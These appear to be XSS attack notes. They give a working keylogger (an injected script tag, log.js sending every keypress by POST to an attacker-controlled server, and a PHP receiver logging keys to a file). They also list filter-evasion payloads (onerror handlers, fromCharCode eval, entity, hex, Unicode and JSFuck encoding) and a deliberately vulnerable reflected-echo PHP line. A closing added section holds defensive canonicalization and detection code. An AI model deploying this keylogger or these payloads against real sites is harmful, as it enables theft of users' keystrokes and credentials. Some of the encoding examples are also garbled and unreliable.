XSS keylogging
Code inserted via XSS
<script type="text/javascript" src="./log.js"></script>
log.js
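// Runs on every keypress in the page where the script was injected
document.onkeypress=function(evt){
  evt=evt ? evt : window.event;
  var key=String.fromCharCode(evt.keyCode ? evt.keyCode : evt.charCode);
  if(key){
    var http=new XMLHttpRequest();
    // encodeURIComponent also escapes &, = and +, which encodeURI leaves as-is
    var param=encodeURIComponent(key);
    // 本地服务器IP is a placeholder for the local server's IP address
    http.open("POST","http://本地服务器IP/keylog/log.php",true);
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("key="+param);
  }
}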
log.php
<?php
// Append each received key to key.txt
$key=$_POST['key'];
$logfile='key.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
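XSS encoding methods
HTML entity encoding
The HTML parser recognizes entity encoding in text and in parameter or attribute values.
It cannot be written into the content of a <script> tag; it only works together with an event trigger.
<img src=x onerror=alert(1)>
Decimal: &#97;&#108;&#101; (decodes to "ale")
Hexadecimal: &#x28;&#x29; (decodes to "()")
Character-code encoding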
<script>eval(String.fromCharCode())</script>
<img src=x onerror=eval(String.fromCharCode())>
Decimal: 97,108,22
Hexadecimal: \x61\x6c\x65
Unicode: \u0061\u006c\u0065
URL encoding
<?php $xss=$_GET['xss'];echo $xss;?>
JSFuck
<img src=x onerror=[JSFuck-encoded JS]>
<script>[JSFuck-encoded JS]</script>
<script>Function("alert(1)")()</script>
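On the filtering side, the encodings listed above (HTML entities, \x and \u escapes, String.fromCharCode lists, URL encoding) have to be undone before any pattern is matched, otherwise the filter only ever sees the encoded form. The JavaScript below is an added example, not part of the original notes; the function names and sample strings are constructed for illustration, and JSFuck is not decoded by it.

```javascript
// Added example: canonicalize input before filtering. All names here are illustrative.
const fromCp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");

// Numeric HTML entities, decimal (&#97;) and hex (&#x61;); the trailing ';' is optional.
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCp(parseInt(d, 10)));
}

// JavaScript string escapes: \xNN and \uNNNN.
function decodeJsEscapes(s) {
  return s.replace(/\\(?:x([0-9a-f]{2})|u([0-9a-f]{4}))/gi,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Fold String.fromCharCode(97,108,...) calls into the string literal they produce.
// An empty argument list, as in the notes above, is left untouched.
function foldFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(\s*(\d[\d\s,]*)\)/g, (_, list) =>
    JSON.stringify(String.fromCharCode(...list.split(",").map(Number))));
}

// Percent-decoding; a malformed sequence makes decodeURIComponent throw, so keep the raw text.
function decodeUrl(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

// Apply all decoders until nothing changes (bounded), which also unwraps double encoding.
function canonicalize(input, maxRounds = 5) {
  let cur = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = foldFromCharCode(decodeJsEscapes(decodeHtmlEntities(decodeUrl(cur))));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Heuristic match on the canonical form only: script tags, inline event handlers, javascript: URLs.
function looksLikeXss(input) {
  return /<script\b|\bon[a-z]+\s*=|javascript:/i.test(canonicalize(input));
}
```

Matching is only a detection aid; the reflected echo of $_GET['xss'] shown above is fixed by encoding on output (htmlspecialchars in PHP), not by filtering input.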